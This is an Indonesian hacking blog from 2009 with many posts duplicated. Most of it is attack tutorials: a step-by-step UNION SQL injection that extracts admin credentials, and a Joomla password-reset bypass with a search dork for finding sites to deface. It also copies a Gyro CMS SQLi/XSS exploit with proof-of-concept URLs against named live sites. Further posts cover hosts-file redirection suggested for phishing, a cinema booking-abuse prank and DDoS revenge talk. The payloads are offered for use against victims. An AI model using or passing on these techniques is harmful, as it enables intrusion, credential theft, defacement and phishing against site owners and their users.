memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara
perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir
Contoh :
[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--
contoh kata yang keluar adalah id,username,password
Contoh :
[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password)
,6,7,8+from+admin--
==============
= step Delapan:=
==============
tahap terakhir mencari halam admin atau login .
---END---
Special Thanks to: N4ck0
Grey Hat Hacker Indonesia
===========
=step Satu:=
===========
carilah target
misal: [site]/berita.php?id=100
Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
contoh:
[site]/berita.php?id=100' atau
[site]/berita.php?id=-100
ehingga muncul pesan error seperti berikut (masih bnyak lagi):
==========
=step Dua:=
==========
mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : order by
contoh:
[site]/berita.php?id=-100+order+by+1-- atau
[site]/berita.php?id=-100+order+by+1/*
ceklah secara step by step (satupersatu)...
misal:
[site]/berita.php?id=-100+order+by+1--
[site]/berita.php?id=-100+order+by+2--
[site]/berita.php?id=-100+order+by+3--
[site]/berita.php?id=-100+order+by+4--
sehingga muncul error atau hilang pesan error...
misal: [site]/berita.php?id=-100+order+by+9--
berarti yang kita ambil adalah sampai angka 8
menjadi [site]/berita.php?id=-100+order+by+8--
===========
=step Tiga:=
===========
untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--
ok seumpama yg keluar angka 5
gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--
lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..
untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver
5 ini bisa menggunakan perintah From+Information_schema..
============
=step Empat:=
============
untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir
Code:
[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.
tables--
seumpama table yang muncul adalah "admin"
===========
=step Lima:=
===========
untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+
from+information_schema.tables+where+table_schema=database()--
=============
= step Enam: =
=============
perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+
information_schema .columns+where+table_name=0xhexa--
pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :
http://www.v3n0m.net/ascii.htm
contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+
information_schema .columns+where+table_name=0x61646D696E--
============
=step Tujuh:=
============
memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara
perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir
Contoh :
[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--
contoh kata yang keluar adalah id,username,password
Contoh :
[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password)
,6,7,8+from+admin--
==============
= step Delapan:=
==============
tahap terakhir mencari halam admin atau login .
---END---
Special Thanks to: N4ck0
Grey Hat Hacker Indonesia
JADOEL TRICKS DEFACE WEBSITE (Joomla)
Tutorial ini sudah tersebar kemana-mana, dan sudah JADOEL, yah, itung-itung nambah database... wkwkwkwk
OK, Tekhnik Deface Web ini dinamakan "Token". Mengapa? karena Token akan membawa kemenangan!
GO TO TUTOR DEH...
1. Cari Mangsa sama om google, dorknya: inurl:/index.php?option=com_user&view=reset&layout=confirm
2. Udah ketemu mangsa misalnya:
www.korban.com/index.php?option=com_user&view=reset&layout=confirm
3. Anda dihadapkan kepada sebuah Form untuk mengisikan "Token", isikan aja single quote (') lalu Lanjoet!!!
4. Jika berhasil, anda akan dihadapkan pada form reset password (Disuruh isi password baru dan mengulangnya), Jika enggak, ada tulisan yang memungkinkan anda salah memasukkan token yang salah, berarti udah dipatch! (Carilah mangsa lain)
5. Masukin aja password yang anda mau... (Terserah)
6. Jika sudah, anda 'mungkin' dihadapkan kepada login form, isikan nama admin lalu password yang tadi anda buat... Kalo enggak, cari aja admin loginnya sendiri...
7. Sudah masuk ke panel nih, ngapain? Lakukan sesuai imajinasi kalian, dan kesadisan anda... (DEFACE kek, apa kek, jadi kakek-kakek kek, dll.)
---END---
OK, Tekhnik Deface Web ini dinamakan "Token". Mengapa? karena Token akan membawa kemenangan!
GO TO TUTOR DEH...
1. Cari Mangsa sama om google, dorknya: inurl:/index.php?option=com_user&view=reset&layout=confirm
2. Udah ketemu mangsa misalnya:
www.korban.com/index.php?option=com_user&view=reset&layout=confirm
3. Anda dihadapkan kepada sebuah Form untuk mengisikan "Token", isikan aja single quote (') lalu Lanjoet!!!
4. Jika berhasil, anda akan dihadapkan pada form reset password (Disuruh isi password baru dan mengulangnya), Jika enggak, ada tulisan yang memungkinkan anda salah memasukkan token yang salah, berarti udah dipatch! (Carilah mangsa lain)
5. Masukin aja password yang anda mau... (Terserah)
6. Jika sudah, anda 'mungkin' dihadapkan kepada login form, isikan nama admin lalu password yang tadi anda buat... Kalo enggak, cari aja admin loginnya sendiri...
7. Sudah masuk ke panel nih, ngapain? Lakukan sesuai imajinasi kalian, dan kesadisan anda... (DEFACE kek, apa kek, jadi kakek-kakek kek, dll.)
---END---
Jumat, 18 September 2009
Rusuh di Blitzmegaplex lewat Komputer
Effect: Ganti-ganti pesanan seat di Blitzmegaplex, jadi orang yang mau mesen malah udah dipesen, tetapi setengah jam kemudian, seat itu tersedia lagi...
Caranya:
1. Pergi ke www.blitzmegaplex.com
2. Klik "Ticket" di atas (Sejajar sama Home) Lalu muncul window baru
3. Pilih aja terserah bioskopnya, film apa, waktunya apa, tanggal berapa, sesuai kebutuhan, lalu klik Continue
4. Pilih aja 4 seat terserah, lalu pilih continue
5. Dihadapan ada Login form, abaikan saja, trus tutup aja window baru-nya...
6. Ulangi dari step 2 sampe puas
Mau diulang lagi?
Ulanglah 20 menit ato 30 menit kemudian...
Pada saat pengulangan, di step 4, liat deh, seat yang tadi kita pesen masih terpesan/pesenan kita nggak tersedia lagi (karena tadi kita udah pesen)
HAHAHAHA!!!
Cocok dipakai untuk isengin temen anda...
-----END-----
Special Thanks to: Th0r
Inspired by: How to Hack Cinema, same concept but have a different tutorial in www.th0r.info
Caranya:
1. Pergi ke www.blitzmegaplex.com
2. Klik "Ticket" di atas (Sejajar sama Home) Lalu muncul window baru
3. Pilih aja terserah bioskopnya, film apa, waktunya apa, tanggal berapa, sesuai kebutuhan, lalu klik Continue
4. Pilih aja 4 seat terserah, lalu pilih continue
5. Dihadapan ada Login form, abaikan saja, trus tutup aja window baru-nya...
6. Ulangi dari step 2 sampe puas
Mau diulang lagi?
Ulanglah 20 menit ato 30 menit kemudian...
Pada saat pengulangan, di step 4, liat deh, seat yang tadi kita pesen masih terpesan/pesenan kita nggak tersedia lagi (karena tadi kita udah pesen)
HAHAHAHA!!!
Cocok dipakai untuk isengin temen anda...
-----END-----
Special Thanks to: Th0r
Inspired by: How to Hack Cinema, same concept but have a different tutorial in www.th0r.info
Kamis, 17 September 2009
Hack Lift
Semua system bisa dihack, termasuk LIFT.
LIFT adalah sebuah benda yang besar untuk mengantarkan kita ke setiap lantai dalam gedung... (Menurut Wikipedia ala gw ^_^)
Effect:
Memakai lift tanpa hambatan dari orang lain (langsung ke lantai yg kita tuju tanpa harus berhenti-berhenti) Misalnya:
kita mau ke lantai 10, ada orang pengen ke lantai 4, jika kita lakukan Lift Hacking, Lift langsung ke lantai 10 tanpa berhenti di lantai 4.
Cara:
1. Tekan Buka dan Tutup secara bersamaan
2. Tekan Tutup dan Lantai Tujuan secara bersamaan
Silahkan pilih dari dua cara diatas, tapi INGAT! Itu dilakukan ketika lift sudah mulai berjalan, jangan sampai telat!
WARNING!
---Do it with your own risk!!!---
Misalnya:
- Ada penjaganya, trus kita lakukan Lift Hacking, nanti malah ditangkep
- Ada banyak orang ke lantai yg berbeda-beda, kalo kita lakukan Lift Hacking, nanti malah digebukin Bareng-bareng!
- Liftnya gak bisa dihack, pake cara Lift Hacking, error, berhenti, gak bisa dibuka, MASALAH BESAR!!!
---END---
By: Aswin Zuckerberg (Facebook)
Sumber: Group Hacker Indonesia di Facebook
LIFT adalah sebuah benda yang besar untuk mengantarkan kita ke setiap lantai dalam gedung... (Menurut Wikipedia ala gw ^_^)
Effect:
Memakai lift tanpa hambatan dari orang lain (langsung ke lantai yg kita tuju tanpa harus berhenti-berhenti) Misalnya:
kita mau ke lantai 10, ada orang pengen ke lantai 4, jika kita lakukan Lift Hacking, Lift langsung ke lantai 10 tanpa berhenti di lantai 4.
Cara:
1. Tekan Buka dan Tutup secara bersamaan
2. Tekan Tutup dan Lantai Tujuan secara bersamaan
Silahkan pilih dari dua cara diatas, tapi INGAT! Itu dilakukan ketika lift sudah mulai berjalan, jangan sampai telat!
WARNING!
---Do it with your own risk!!!---
Misalnya:
- Ada penjaganya, trus kita lakukan Lift Hacking, nanti malah ditangkep
- Ada banyak orang ke lantai yg berbeda-beda, kalo kita lakukan Lift Hacking, nanti malah digebukin Bareng-bareng!
- Liftnya gak bisa dihack, pake cara Lift Hacking, error, berhenti, gak bisa dibuka, MASALAH BESAR!!!
---END---
By: Aswin Zuckerberg (Facebook)
Sumber: Group Hacker Indonesia di Facebook
Rabu, 16 September 2009
Times Up, Rapidshare!!! (Rapidshare Hacking)
---1|\|7R0|)U(710|\|---
Rapidshare adalah situs Sharing File antar user dunia maya... Taukah anda bahwa kita bisa mendapat hak Premium Account dengan Free User?
Ini adalah ilmu hacking dari SpyroKiD, Hehehe....
Effect:
Kalo download di Rapidshare, kalo pake Free User kita gak perlu nunggu beberapa puluh detik dulu... (Kayak pake Premium Account)
Tutor:
1. Copas link Download Rapidshare (terserah, yg pengen kamu download)
2. Klik Free User
3. Abaikan countdown untuk memperlihatkan tombol download
4. HAPUUUSSS Semua URL di Address Bar
5. Copas code ini ke Address Bar: javascript:alert(c=0)
6. Klik Enter!!!
7. Jangan panik jika ada alert, itu tanda-tanda kemenangan!
Nah! Langsung dah keliatan tuh Link Download...
---END---
Sumber: www.spyrozone.net
Penulis: SpyroKiD
Rapidshare adalah situs Sharing File antar user dunia maya... Taukah anda bahwa kita bisa mendapat hak Premium Account dengan Free User?
Ini adalah ilmu hacking dari SpyroKiD, Hehehe....
Effect:
Kalo download di Rapidshare, kalo pake Free User kita gak perlu nunggu beberapa puluh detik dulu... (Kayak pake Premium Account)
Tutor:
1. Copas link Download Rapidshare (terserah, yg pengen kamu download)
2. Klik Free User
3. Abaikan countdown untuk memperlihatkan tombol download
4. HAPUUUSSS Semua URL di Address Bar
5. Copas code ini ke Address Bar: javascript:alert(c=0)
6. Klik Enter!!!
7. Jangan panik jika ada alert, itu tanda-tanda kemenangan!
Nah! Langsung dah keliatan tuh Link Download...
---END---
Sumber: www.spyrozone.net
Penulis: SpyroKiD
Hmm, situs Deddy Corbuzier udah direpair toh...
Setelah buka Jatimcrew, saya buka situs Om Deddy Corbuzier, en Ternyata udah direpair toh!!!
Hahaha, ternyata gak ada apa-apanya di situs itu, lainnya cuma ke web laen...
NEW TARGET: blog para seleb, siapa tau bisa dihack... Ato... jangan-jangan Reselling Hosting dari blogger.com... (NGERI)
---END---
Hahaha, ternyata gak ada apa-apanya di situs itu, lainnya cuma ke web laen...
NEW TARGET: blog para seleb, siapa tau bisa dihack... Ato... jangan-jangan Reselling Hosting dari blogger.com... (NGERI)
---END---
Jatimcrew is Back!
Siang-siang abis bikin PR (Belom selesai), Nyalain komputer online lagi... trus buka Jatimcrew, Eeeh, udah bisa diakses, Selamat yee...
---AYO KITA BALAS PERBUATAN MALINGSHIT---
--END--
---AYO KITA BALAS PERBUATAN MALINGSHIT---
--END--
Selasa, 15 September 2009
Buat dan Delete Folder dengan VB aka Visual Basic
Ini ada beberapa Syntax untuk membuat atau delete Folder:
1. Delete Folder: (Hanya untuk Folder yg kosong)
RmDir (”c:\FolderTest”)
2. Delete ISI Folder (Hapusin dulu data-data yg ada di folder...)
Kill “c:\FolderTest\*.*”
3. Buat Folder:
MkDir (”c:\FolderTest”)
SELAMAT MENCOBA
Sumber: http://pondokindah.wordpress.com/
Penulis: Sarach
1. Delete Folder: (Hanya untuk Folder yg kosong)
RmDir (”c:\FolderTest”)
2. Delete ISI Folder (Hapusin dulu data-data yg ada di folder...)
Kill “c:\FolderTest\*.*”
3. Buat Folder:
MkDir (”c:\FolderTest”)
SELAMAT MENCOBA
Sumber: http://pondokindah.wordpress.com/
Penulis: Sarach
Senin, 14 September 2009
Jatimcrew kena DDoS sama Dark Malaysia (Dari seminggu lalu)
TURUT BERDUKA CITA atas ke-DDoS-nya Jatimcrew... Padahal saya sering kesana tanpa Register, cari-cari ilmu gitu loh... (Tapi mungkin seringan ke HC sama Spyrozone... ^_^)
Bener-bener tuh Malingsial... (Tapi mungkin karena Jatimcrew juga yang suka hack Maling tersebut, tapi (katanya) belum ada penangkal DDoS...
Yep, intinya, jika anda sekalian mau DiDiOeS-sin si Dark Malaysia itu, kita tetapin kapan, jam berapa, detik berapa, mili detik berapa (???)
Bagi warga Jaticrew yang kena imbasnya, kalian bisa susun strategi disini (Ceileehh... Strategi...)
Yaudah, pokok'e, /me turut berduka cita aja...
---END---
Bener-bener tuh Malingsial... (Tapi mungkin karena Jatimcrew juga yang suka hack Maling tersebut, tapi (katanya) belum ada penangkal DDoS...
Yep, intinya, jika anda sekalian mau DiDiOeS-sin si Dark Malaysia itu, kita tetapin kapan, jam berapa, detik berapa, mili detik berapa (???)
Bagi warga Jaticrew yang kena imbasnya, kalian bisa susun strategi disini (Ceileehh... Strategi...)
Yaudah, pokok'e, /me turut berduka cita aja...
---END---
Minggu, 13 September 2009
Windows Hacking: Manipulasi Localhost
Anda pasti tau tentang Localhost aka 127.0.0.1 (GAK TAU??? Gak apa-apa... Localhost itu adalah Jaringan/Alamat/IP/Local Web Directory Komputer kita sendiri... Jadi, kalo kita DDoS ke 127.0.0.1 namanya BUNUH DIRI!!!)
Nah, kita akan membuat Domain .com gratis untuk localhost kita (tapi KAYAKNYA cuma buat kompi kita sendiri deh...)
Tutorial-nye...
Buka Windows Explorer, lalu ketik di address bar: C:\WINDOWS\system32\drivers\etc
Buka file hosts dengan text editor dan anda akan melihat text seperti ini:
# Copyright (c) 1993-1999 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
Paham penggunaan file ini?
Lalu, setelah itu dan sesudah itu, Kini, kita tambahkan baris baru dibawahnya seperti ini:
127.0.0.1 localhost klik-bca.com www.klik-bca.com
Lalu, setelah itu dan sesudah itu, Kini, kita ke web browser kita, lalu ketik di address bar, www.klik-bca.com, yang keluar bukannya klik-bca.com malah web directory lokal kita...
Jadi, intinye, kita bisa merubah domain web direktori lokal kita dengan domain lain, seperti kalo mau (pura-pura) deface/DDoS situs, kita masukin aja www.google.com di warnet... (hehehehe!!!) dan juga kita bisa phising dengan menghantarkan dari Facebook ke web direktori lokal komputer... Pokok'e terserah deh, be creative...
---END---
Sumber: www.spyrozone.net
Penulis Asli: SpyroKiD
Nah, kita akan membuat Domain .com gratis untuk localhost kita (tapi KAYAKNYA cuma buat kompi kita sendiri deh...)
Tutorial-nye...
Buka Windows Explorer, lalu ketik di address bar: C:\WINDOWS\system32\drivers\etc
Buka file hosts dengan text editor dan anda akan melihat text seperti ini:
# Copyright (c) 1993-1999 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
Paham penggunaan file ini?
Lalu, setelah itu dan sesudah itu, Kini, kita tambahkan baris baru dibawahnya seperti ini:
127.0.0.1 localhost klik-bca.com www.klik-bca.com
Lalu, setelah itu dan sesudah itu, Kini, kita ke web browser kita, lalu ketik di address bar, www.klik-bca.com, yang keluar bukannya klik-bca.com malah web directory lokal kita...
Jadi, intinye, kita bisa merubah domain web direktori lokal kita dengan domain lain, seperti kalo mau (pura-pura) deface/DDoS situs, kita masukin aja www.google.com di warnet... (hehehehe!!!) dan juga kita bisa phising dengan menghantarkan dari Facebook ke web direktori lokal komputer... Pokok'e terserah deh, be creative...
---END---
Sumber: www.spyrozone.net
Penulis Asli: SpyroKiD
Cara Kerja KumpulBlogger (Mungkin semua situs setipe KumpulBlogger juga pake system kayak gini...)
OK, /me mau share sesuatu yang (mungkin) berharga bagi kalian!!!
Gini, saya kan liat di URL Ads-nya kumpulblogger tidak sama dengan situs yang diadvertise (beneran, kayaknya mirip Adsense...) Misalnya: Link yang di-iklankan: www.google.com, kalo misalnya cursor kitaarahin ke linknya, dibawah biasanya dikasih tau addressnya apa... (liat gak di KIRI-BAWAH???) Nah, addressnya begini: www.kumpulblogger.com/lempar.php?222/...... (dan embel-embel lainnya/Nomor ID/UID, dll. Misalnya: www.kumpulblogger.com/lempar.php?222/222/222/#222
Nah, di address www.kumpulblogger.com/lempar.php?222/222/222/#222, Terdapat script untuk menambah poin orang yang pasang script kumpulblogger + Redirector ke Link yang di-iklankan!!!
Dan yang ini nih yang bikin gw sebel:
KumpulBlogger itu bukan PPC (Pay Per Click) tapi PPUC (Pay Per Unique Click)
Pay Per Unique Click itu adalah mendapatkan uang hasil klik ads 1 orang!!! (Mungkin juga satu IP)
Jadi, kalo ada orang yang mengklik lebih dari 100 juta kali klik dalam satu hari tetep aja DI-ITUNG SATU KALI!!! (Sebel gak tuh???)
OK, saya sudah sharing semua yang saya tau tentang KumpulBlogger, dan kayaknya KumpulBlogger juga memonitor anggotanya deh, buktinya:
Setelah |)347|-| 807 klik ads-ku berturut-turut dan dia kasih tau tentang apa yang diperbuatnya dan saya juga mengaku di "Cerita Seorang Darkness Hacker" langsung esoknya saya udah gak dianggep!!!
Jadi, intinya, Security KumpulBlogger gak cuma sebatas Bot doank... tapi dia juga memonitor secara manual... (patut ditiru, teman-teman) Tapi ingat: "Nothing is Secure" bisa saja KumpulBlogger akan dihack juga... (sama kayak takdir Facebook...)
---END OF POSTING---
Gini, saya kan liat di URL Ads-nya kumpulblogger tidak sama dengan situs yang diadvertise (beneran, kayaknya mirip Adsense...) Misalnya: Link yang di-iklankan: www.google.com, kalo misalnya cursor kitaarahin ke linknya, dibawah biasanya dikasih tau addressnya apa... (liat gak di KIRI-BAWAH???) Nah, addressnya begini: www.kumpulblogger.com/lempar.php?222/...... (dan embel-embel lainnya/Nomor ID/UID, dll. Misalnya: www.kumpulblogger.com/lempar.php?222/222/222/#222
Nah, di address www.kumpulblogger.com/lempar.php?222/222/222/#222, Terdapat script untuk menambah poin orang yang pasang script kumpulblogger + Redirector ke Link yang di-iklankan!!!
Dan yang ini nih yang bikin gw sebel:
KumpulBlogger itu bukan PPC (Pay Per Click) tapi PPUC (Pay Per Unique Click)
Pay Per Unique Click itu adalah mendapatkan uang hasil klik ads 1 orang!!! (Mungkin juga satu IP)
Jadi, kalo ada orang yang mengklik lebih dari 100 juta kali klik dalam satu hari tetep aja DI-ITUNG SATU KALI!!! (Sebel gak tuh???)
OK, saya sudah sharing semua yang saya tau tentang KumpulBlogger, dan kayaknya KumpulBlogger juga memonitor anggotanya deh, buktinya:
Setelah |)347|-| 807 klik ads-ku berturut-turut dan dia kasih tau tentang apa yang diperbuatnya dan saya juga mengaku di "Cerita Seorang Darkness Hacker" langsung esoknya saya udah gak dianggep!!!
Jadi, intinya, Security KumpulBlogger gak cuma sebatas Bot doank... tapi dia juga memonitor secara manual... (patut ditiru, teman-teman) Tapi ingat: "Nothing is Secure" bisa saja KumpulBlogger akan dihack juga... (sama kayak takdir Facebook...)
---END OF POSTING---
Jumat, 11 September 2009
Bugs masih anget!!! (Barusan diupdate...) XSS + SQLi
OK, bug ini adalah bug yang ada di Gyro v.5.0 dan ditemukan oleh OoN_Boy
Kita akan langsung liat apa bugsnya...
Google Dork:
"powered by Gyro V5.0"
Exploit:
http://localhost/home?op=cat&cid=[sql]
http://localhost/home?op=cat&cid=[Xss]
POC:
http://www.vansda.ca/home?op=cat&cid=29+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14--
http://www.vansda.ca/home?op=cat&cid=29"BAscriptBalert(123456)A/scriptB
http://www.phpmath.com/home?op=cat&cid=29+union+select+version(),2,3,4,5,6,7,8,9,10,11,12,13,14--
http://www.phpmath.com/home?op=cat&cid=29"BAscriptBalert(123456)A/scriptB
INGET!
AB = <>
Copased from milw0rm.com
OoN_Boy juga meninggalkan pesan-pesan terakhir kepada (Greetz maksudnya...): Antisecurity[dot]Org www.BatamHacker.or.id www.MainHack.com www.ServerIsDown.org -
Vrs-hCk, c0li, h4ntu, Opay, Ipay, Paman, NoGe, H312Y, pizzyroot,
zxvf, Joe Chawanua, k0rea [Ntc],xx_user, s3t4n, Angela Chang, IrcMafia,
str0ke, em|nem, Pandoe, Ronny ^s0n g0ku^
---END---
Special Thanks to OoN_Boy
Sumber: www.milw0rm.com
Kita akan langsung liat apa bugsnya...
Google Dork:
"powered by Gyro V5.0"
Exploit:
http://localhost/home?op=cat&cid=[sql]
http://localhost/home?op=cat&cid=[Xss]
POC:
http://www.vansda.ca/home?op=cat&cid=29+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14--
http://www.vansda.ca/home?op=cat&cid=29"BAscriptBalert(123456)A/scriptB
http://www.phpmath.com/home?op=cat&cid=29+union+select+version(),2,3,4,5,6,7,8,9,10,11,12,13,14--
http://www.phpmath.com/home?op=cat&cid=29"BAscriptBalert(123456)A/scriptB
INGET!
AB = <>
Copased from milw0rm.com
OoN_Boy juga meninggalkan pesan-pesan terakhir kepada (Greetz maksudnya...): Antisecurity[dot]Org www.BatamHacker.or.id www.MainHack.com www.ServerIsDown.org -
Vrs-hCk, c0li, h4ntu, Opay, Ipay, Paman, NoGe, H312Y, pizzyroot,
zxvf, Joe Chawanua, k0rea [Ntc],xx_user, s3t4n, Angela Chang, IrcMafia,
str0ke, em|nem, Pandoe, Ronny ^s0n g0ku^
---END---
Special Thanks to OoN_Boy
Sumber: www.milw0rm.com
HOAX Virtual Card for you
Ditemukan sebuah "HOAX" (Berita Bohong) yang menyatakan tentang virus yang menyebar dari Email yang bersubyek "Virtual Card For You"
Pernah dapet HOAX itu? Saya katakan sekali lagi LANGSUNG HAPUS!!! JANGAN DISEBARKAN, Jika anda tidak mau dikatain "HOAX-er"
HOAX-nya seperti ini:
VIRUS BARU
BACALAH DENGAN SEGERA, KIRIMKANLAH PESAN INI KE SEMUA NAMA DALAM DAFTAR ALAMAT ANDA.
VIRUS PALING JAHAT DARI YANG PERNAH ADA
Sebuah virus baru sudah ditemukan, dan digolongkan oleh Microsoft sebagai yang paling merusak!Virus itu baru ditemukan pada hari Minggu siang yang lalu oleh McAfee, dan belum ditemukan vaksin untuk mengalahkannya.
Virus ini merusak Zero dari Sektor hard disc, yang menyimpan fungsi informasi-informasi terpenting. Virus ini berjalan sebagai berikut :
1. secara otomatis virus ini akan terkirim ke semua nama dalam daftar alamat anda dengan judul “Sebuah Kartu Untuk Anda” ( Une Carte Pour Vous , atau A Card For You )
2. begitu kartu virtual itu terbuka, virus itu akan membekukan komputer sehingga penggunanya harus memulainya kembali; kalau anda menekan CTRL+ALT+DEL atau perintah untuk restart, virus itu akan merusak Zero dari Sektor Boot hard disk, sehingga hard disk akan rusak secara permanen.
Menurut CNN, virus itu dalam beberapa jam sudah menimbulkan kepanikan di New York . Peringatan ini telah diterima oleh pegawai Microsoft sendiri. Jangan membuka e-mail dengan judul “Sebuah kartu virtual untuk Anda” ( Une Carte Virtuelle Pour Vous atau A Virtual Card For You ).
Kirimkan pesan ini kepada semua teman anda. Saya rasa bahwa sebagian besar orang, seperti saya sendiri, lebih suka mendapat peringatan ini 25 kali daripada tidak sama sekali.
AWAS!!!
Jangan terima kontak ” pti_bout_de_ chou @hotmail.com “. Ini virus yang akan memformat komputer anda. Kirimkan pesan ini ke semua orang yang ada di dalam daftar alamat anda.
Kalau anda tidak melakukannya dan salah seorang teman anda memasukkannya dalam daftar alamatnya, komputer anda juga akan terkena
-----------------------
Yang tulisan merah itu adalah bukti bahwa ini adalah HOAX!
So, HATI-HATI TEMAN-TEMAN!!! Janganlah percaya yang namanya HOAX!!!
Oke...
Oke...
Oke...
Janji yaa... (Soalnya saya gak mau dapet HOAX... dan kayaknya aku kena imbas orang gila yang kena virus yang bernama virut, jadinya saya dapet spam, spam, and spam...)
---END---
Sumber: Kumpulan HOAX
Pernah dapet HOAX itu? Saya katakan sekali lagi LANGSUNG HAPUS!!! JANGAN DISEBARKAN, Jika anda tidak mau dikatain "HOAX-er"
HOAX-nya seperti ini:
VIRUS BARU
BACALAH DENGAN SEGERA, KIRIMKANLAH PESAN INI KE SEMUA NAMA DALAM DAFTAR ALAMAT ANDA.
VIRUS PALING JAHAT DARI YANG PERNAH ADA
Sebuah virus baru sudah ditemukan, dan digolongkan oleh Microsoft sebagai yang paling merusak!Virus itu baru ditemukan pada hari Minggu siang yang lalu oleh McAfee, dan belum ditemukan vaksin untuk mengalahkannya.
Virus ini merusak Zero dari Sektor hard disc, yang menyimpan fungsi informasi-informasi terpenting. Virus ini berjalan sebagai berikut :
1. secara otomatis virus ini akan terkirim ke semua nama dalam daftar alamat anda dengan judul “Sebuah Kartu Untuk Anda” ( Une Carte Pour Vous , atau A Card For You )
2. begitu kartu virtual itu terbuka, virus itu akan membekukan komputer sehingga penggunanya harus memulainya kembali; kalau anda menekan CTRL+ALT+DEL atau perintah untuk restart, virus itu akan merusak Zero dari Sektor Boot hard disk, sehingga hard disk akan rusak secara permanen.
Menurut CNN, virus itu dalam beberapa jam sudah menimbulkan kepanikan di New York . Peringatan ini telah diterima oleh pegawai Microsoft sendiri. Jangan membuka e-mail dengan judul “Sebuah kartu virtual untuk Anda” ( Une Carte Virtuelle Pour Vous atau A Virtual Card For You ).
Kirimkan pesan ini kepada semua teman anda. Saya rasa bahwa sebagian besar orang, seperti saya sendiri, lebih suka mendapat peringatan ini 25 kali daripada tidak sama sekali.
AWAS!!!
Jangan terima kontak ” pti_bout_de_ chou @hotmail.com “. Ini virus yang akan memformat komputer anda. Kirimkan pesan ini ke semua orang yang ada di dalam daftar alamat anda.
Kalau anda tidak melakukannya dan salah seorang teman anda memasukkannya dalam daftar alamatnya, komputer anda juga akan terkena
-----------------------
Yang tulisan merah itu adalah bukti bahwa ini adalah HOAX!
So, HATI-HATI TEMAN-TEMAN!!! Janganlah percaya yang namanya HOAX!!!
Oke...
Oke...
Oke...
Janji yaa... (Soalnya saya gak mau dapet HOAX... dan kayaknya aku kena imbas orang gila yang kena virus yang bernama virut, jadinya saya dapet spam, spam, and spam...)
---END---
Sumber: Kumpulan HOAX
Kamis, 10 September 2009
Lebih jauh tentang diriku...
AWAS! JIKA ANDA TIDAK MEMBACANYA LANGSUNG DI BLOGNYA, ANDA AKAN SALAH PAHAM!!!
Ahaha... ngepost beginian, kayak gak ada kerjaan aja...
Tapi emang gw tukang nulis sih... (Copas lebih sering untuk tutor... ^_^)
ok,yang ingin mengenalku lebih jauh, tunggu bentar...
bentar....
bentar.....
bentar.....
bentar lagi....
sedikit lagi......
BERSAMBUNG...
Hahahahahaha!!!
Nih, saya bercerita tentang diriku...
Jadi, saya dulu (kira-kira kelas 3 SD) mengenal yang Namanya "Hacking" tapi dulu gambaran saya pada waktu itu tentang hacking adalah "Takeover", "Main Bobol", "Nyuri Passowrd", dll. Tapi saya pada saat itu gak hack-hackan karena gak ada internet... ^_^ baru tuh, pas kelas 6, saya maen mig33 dan banyak temen-temen sepermainan dota, sampe om-om pun maen...
